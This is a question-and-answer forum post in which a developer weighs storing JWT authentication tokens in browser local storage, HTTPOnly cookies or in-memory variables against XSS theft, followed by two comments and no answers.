1

I am struggling in order to decide which authentication strategy to adopt for a critical MVP I am working on.

Initially I was thinking about stateful JWT (Yes I know it is stateful, my API will not be RESTFul and I will burn in hell :) ). The main point I liked about JWT with respect to old style sessions (using HTTPOnly cookie for storage) was that I could have used the same authentication strategy for all my clients (i.e. my single page app, mobile app, third party, etc. all putting the token in the Authorization field of the HTTP header).

Then I red tons of material about JWT authentication and JWT itself including:

  1. This stackoverflow question
  2. This great explanation of jwt (jws/jwe) from medium
  3. This nice article about authentication best practices
  4. These articles 1, 2, 3 from different sources strongly suggesting not to use JWT as authentication methods for web applicatons.

So, I ended-up with a strong skepticism about using JWT authentication for the web app, due to the lack of a secure storage mechanism in the browser (local/session storage are easily accessible for XSS attackers).

Storing the JWT token in a HTTPOnly cookie is also a no go to me, since I would lose the benefit I previously mentioned about JWT and I would get several overheads (increased requests size, just to mention one) as explained in articles cited at point 4 above.

Nonetheless one point that came out in the comments of link at point 1 is still preventing me from getting rid of the idea of using JWT as the only authentication method, that is:

I do not see why stealing a JWT token from local/session storage should be easier for an XSS attacker than stealing user credentials directly from the login form, can anyone clarify this point?

In case the answer to the previous question should be that it is somehow much easier to stole data from the local/session storage, than another question follows:

if I use a js variable or some other non-persistent approach to store the JWT token (so I accept to require users to re-login every time they refresh the page or close the browser) is there any option to gain something in terms of XSS protection with respect to local/session storage?

Any qualified answer will be extremely appreciated.

Steffen Moritz
  • 7,277
  • 11
  • 36
  • 55
Andrea Citrolo
  • 176
  • 1
  • 1
  • 7
  • The JWT persists in local storage, so an XSS attack stealing the token can happen anywhere after the user is logged in. For an XSS to happen exactly when the user is logging in to steal the password ... I'm no expert but I find that hard to imagine how that is going to happen. Maybe by logging key strokes, okay, but it is very restricted where that XSS has to happen, whereas stealing something from local storage can happen anywhere, any time after the user has logged in. So I'd say stealing the JWT is a much wider attack surface. – TheGreatContini Jul 22 '19 at 01:49
  • Yes I see this point, that is valid, but I think most of the time once the attacker is able to inject some javascript code he/she can also track the requests content so even the limited time window is not a huge plus in terms of security it just delays the exploit to the next login after the attack has succeeded. – Andrea Citrolo Jul 27 '19 at 14:26

0 Answers0